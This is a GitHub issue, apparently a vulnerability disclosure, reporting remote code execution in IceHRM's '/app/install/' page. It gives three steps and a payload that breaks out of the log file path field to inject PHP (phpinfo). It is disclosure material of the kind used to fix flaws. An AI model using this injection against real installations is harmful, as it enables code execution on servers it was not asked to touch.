Security Report: A Remote Code Execution (RCE) vulnerability exists in icehrm via "/app/install/"

A Remote Code Execution (RCE) vulnerability exists in icehrm via "/app/install/".

Step to exploit:

1. Navigate to IceHRM Installation: http://localhost/icehrm/app/install.
2. Insert payload "data/icehrm.log');phpinfo();#" to Log file path and then Install Application.
3. Visit http://localhost/icehrm/app

![Screenshot 2022-04-09 at 12 30 49](https://user-images.githubusercontent.com/35623498/162558344-03e941d2-2cca-4444-9e42-0e248bf49fc1.png)

![Screenshot 2022-04-09 at 12 27 51](https://user-images.githubusercontent.com/35623498/162558355-e26b0699-3447-452d-a3aa-ab88e90b79e1.png)



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Security Report: A Remote Code Execution (RCE) vulnerability exists in icehrm via "/app/install/" #303

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Security Report: A Remote Code Execution (RCE) vulnerability exists in icehrm via "/app/install/" #303

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions